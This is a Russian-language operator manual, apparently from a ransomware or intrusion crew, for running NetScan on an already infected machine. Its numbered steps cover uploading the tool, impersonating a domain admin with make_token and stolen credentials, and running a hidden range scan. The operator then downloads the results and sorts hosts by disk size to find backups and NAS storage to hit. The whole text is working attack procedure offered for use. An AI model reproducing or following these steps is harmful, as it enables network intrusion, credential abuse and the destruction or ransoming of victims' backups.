Замечательный инструмент-NetScan, который облегчает разведку и поиск NAS\Backup и т.д.
Сканирует сети по диапазонам, используя креды юзера\админа, от имени которого запустили софт.
Выдаёт cледующую информацию:
Имя хоста, открытые порты, принадлежность к группе\домену, общий объём дисков, доступные шары, производитель устройства, роль ПК\сервера

1) Грузим папку NetScan на любой заражённый ПК. Допустим, C:\Programdata\netscan

2) cd C:\programdata\netscan

3) make_token DOMAIN\admin password

4) shell netscan.exe /hide /auto:"result.xml" /config:netscan.xml /range:192.168.0.1-192.168.1.255
Меняем диапазоны на свои, остальное не трогаем

5) Ждём. После завершения у нас в папке появится файл result.xml, выкачиваем его себе на комп

6) Открываем NetScan у себя на винде, подгружаем туда выкачанный файл и смотрим результат в удобном формате.
Сортируем по размеру диска, так вы сразу поймёте, где самый сок спрятан

Отдельное спасибо Perry за помощь в поиске техдокументации, на основе которой написан данный мануал.
Sonic, можно добавить NetScan в алгоритм